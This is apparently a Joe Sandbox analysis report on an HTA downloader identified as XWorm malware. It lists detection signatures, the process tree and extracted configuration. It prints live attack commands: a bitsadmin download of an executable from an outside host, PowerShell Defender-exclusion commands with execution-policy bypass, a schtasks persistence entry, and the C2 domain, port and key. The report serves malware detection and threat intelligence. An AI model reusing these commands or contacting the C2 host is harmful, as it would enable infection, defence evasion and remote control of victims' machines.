Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
downloader2.hta

Overview

General Information

Sample name:downloader2.hta
Analysis ID:1568462
MD5:14d473e5742bc69b4360025876bcee11
SHA1:dd6fe9ffd3454aca4be62bdc4e5801640590dbd4
SHA256:36e409c298efa59e2062e44b5cefb8b445c18f98c5524de0ace1ccac27c41010
Tags:htauser-abuse_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Parents
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download files via bitsadmin
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 4012 cmdline: mshta.exe "C:\Users\user\Desktop\downloader2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • bitsadmin.exe (PID: 3628 cmdline: "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://2k8u3.org/wininit.exe C:\Users\user\AppData\Local\Temp\wininit.exe MD5: F57A03FA0E654B393BB078D1C60695F3)
      • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wininit.exe (PID: 1292 cmdline: "C:\Users\user\AppData\Local\Temp\wininit.exe" MD5: DC8534F103A3167CEC27B4B01FEA89A4)
      • powershell.exe (PID: 3276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wininit.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\wininit.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wininit.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2656 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\user\AppData\Roaming\wininit.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5688 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wininit.exe (PID: 5428 cmdline: C:\Users\user\AppData\Roaming\wininit.exe MD5: DC8534F103A3167CEC27B4B01FEA89A4)
  • wininit.exe (PID: 6180 cmdline: "C:\Users\user\AppData\Roaming\wininit.exe" MD5: DC8534F103A3167CEC27B4B01FEA89A4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["ddk.2k8u3.org"], "Port": 5234, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\BIT6DEB.tmpJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\BIT6DEB.tmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Roaming\wininit.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\wininit.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Local\Temp\BIT6DEB.tmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xf3b7:$s6: VirtualBox
          • 0xf315:$s8: Win32_ComputerSystem
          • 0x1106f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x1110c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x11221:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x103b9:$cnc4: POST / HTTP/1.1
          Click to see the 1 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000005.00000002.3282808526.0000000002711000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000003.00000003.2432558607.000001BA6955B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000003.00000003.2432558607.000001BA6955B000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x3012:$s6: VirtualBox
              • 0x2f70:$s8: Win32_ComputerSystem
              • 0x4cca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x4d67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x4e7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x4014:$cnc4: POST / HTTP/1.1
              00000005.00000000.2434580556.00000000003E2000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000005.00000000.2434580556.00000000003E2000.00000002.00000001.01000000.00000009.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xf1b7:$s6: VirtualBox
                • 0xf115:$s8: Win32_ComputerSystem
                • 0x10e6f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x10f0c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x11021:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x101b9:$cnc4: POST / HTTP/1.1
                Click to see the 8 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                5.0.wininit.exe.3e0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  5.0.wininit.exe.3e0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    5.0.wininit.exe.3e0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xf3b7:$s6: VirtualBox
                    • 0xf315:$s8: Win32_ComputerSystem
                    • 0x1106f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x1110c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x11221:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x103b9:$cnc4: POST / HTTP/1.1
                    5.2.wininit.exe.27df820.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      5.2.wininit.exe.27df820.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0xd5b7:$s6: VirtualBox
                      • 0xd515:$s8: Win32_ComputerSystem
                      • 0xf26f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0xf30c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0xf421:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0xe5b9:$cnc4: POST / HTTP/1.1
                      Click to see the 3 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Files With System Process Name In Unsuspected Locations
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\wininit.exe, ProcessId: 1292, TargetFilename: C:\Users\user\AppData\Roaming\wininit.exe
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\wininit.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\wininit.exe, ParentProcessId: 1292, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', ProcessId: 3276, ProcessName: powershell.exe
                      Sigma detected: Script Interpreter Execution From Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\wininit.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\wininit.exe, ParentProcessId: 1292, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', ProcessId: 3276, ProcessName: powershell.exe
                      Sigma detected: Suspicious MSHTA Child Process
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://2k8u3.org/wininit.exe C:\Users\user\AppData\Local\Temp\wininit.exe, CommandLine: "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://2k8u3.org/wininit.exe C:\Users\user\AppData\Local\Temp\wininit.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\bitsadmin.exe, NewProcessName: C:\Windows\SysWOW64\bitsadmin.exe, OriginalFileName: C:\Windows\SysWOW64\bitsadmin.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\downloader2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4012, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://2k8u3.org/wininit.exe C:\Users\user\AppData\Local\Temp\wininit.exe, ProcessId: 3628, ProcessName: bitsadmin.exe
                      Sigma detected: Suspicious Process Parents
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://2k8u3.org/wininit.exe C:\Users\user\AppData\Local\Temp\wininit.exe, ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 3628, ParentProcessName: bitsadmin.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6576, ProcessName: conhost.exe
                      Sigma detected: Suspicious Script Execution From Temp Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\wininit.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\wininit.exe, ParentProcessId: 1292, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', ProcessId: 3276, ProcessName: powershell.exe
                      Sigma detected: System File Execution Location Anomaly
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\Temp\wininit.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\wininit.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\wininit.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\wininit.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\wininit.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\downloader2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4012, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\wininit.exe" , ProcessId: 1292, ProcessName: wininit.exe
                      Sigma detected: Windows Binaries Write Suspicious Extensions
                      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\wininit.exe, ProcessId: 1292, TargetFilename: C:\Users\user\AppData\Roaming\wininit.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\wininit.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\wininit.exe, ParentProcessId: 1292, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', ProcessId: 3276, ProcessName: powershell.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\wininit.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\wininit.exe, ProcessId: 1292, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\wininit.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\wininit.exe, ParentProcessId: 1292, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', ProcessId: 3276, ProcessName: powershell.exe
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\wininit.exe, ProcessId: 1292, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wininit.lnk
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\wininit.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\wininit.exe, ParentProcessId: 1292, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 2656, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\wininit.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\wininit.exe, ParentProcessId: 1292, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 2656, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\wininit.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\wininit.exe, ParentProcessId: 1292, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe', ProcessId: 3276, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5688, ProcessName: svchost.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Schedule system process
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\wininit.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\wininit.exe, ParentProcessId: 1292, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 2656, ProcessName: schtasks.exe

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://2k8u3.org/wininit.exe/C:Avira URL Cloud: Label: malware
                      Source: http://2k8u3.org/wininit.exeAvira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\BIT6DEB.tmpAvira: detection malicious, Label: TR/Spy.Gen
                      Source: C:\Users\user\AppData\Roaming\wininit.exeAvira: detection malicious, Label: TR/Spy.Gen
                      Found malware configuration
                      Source: 00000005.00000002.3282808526.0000000002711000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["ddk.2k8u3.org"], "Port": 5234, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\BIT6DEB.tmpReversingLabs: Detection: 91%
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exe (copy)ReversingLabs: Detection: 91%
                      Source: C:\Users\user\AppData\Roaming\wininit.exeReversingLabs: Detection: 91%
                      Multi AV Scanner detection for submitted file
                      Source: downloader2.htaReversingLabs: Detection: 31%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\BIT6DEB.tmpJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\wininit.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: 5.2.wininit.exe.27df820.0.raw.unpackString decryptor: ddk.2k8u3.org
                      Source: 5.2.wininit.exe.27df820.0.raw.unpackString decryptor: 5234
                      Source: 5.2.wininit.exe.27df820.0.raw.unpackString decryptor: <123456789>
                      Source: 5.2.wininit.exe.27df820.0.raw.unpackString decryptor: <Xwormmm>
                      Source: 5.2.wininit.exe.27df820.0.raw.unpackString decryptor: NSudo
                      Source: 5.2.wininit.exe.27df820.0.raw.unpackString decryptor: USB.exe
                      Source: 5.2.wininit.exe.27df820.0.raw.unpackString decryptor: %AppData%
                      Source: 5.2.wininit.exe.27df820.0.raw.unpackString decryptor: wininit.exe

                      Networking

                      barindex
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: ddk.2k8u3.org
                      Yara detected Generic Downloader
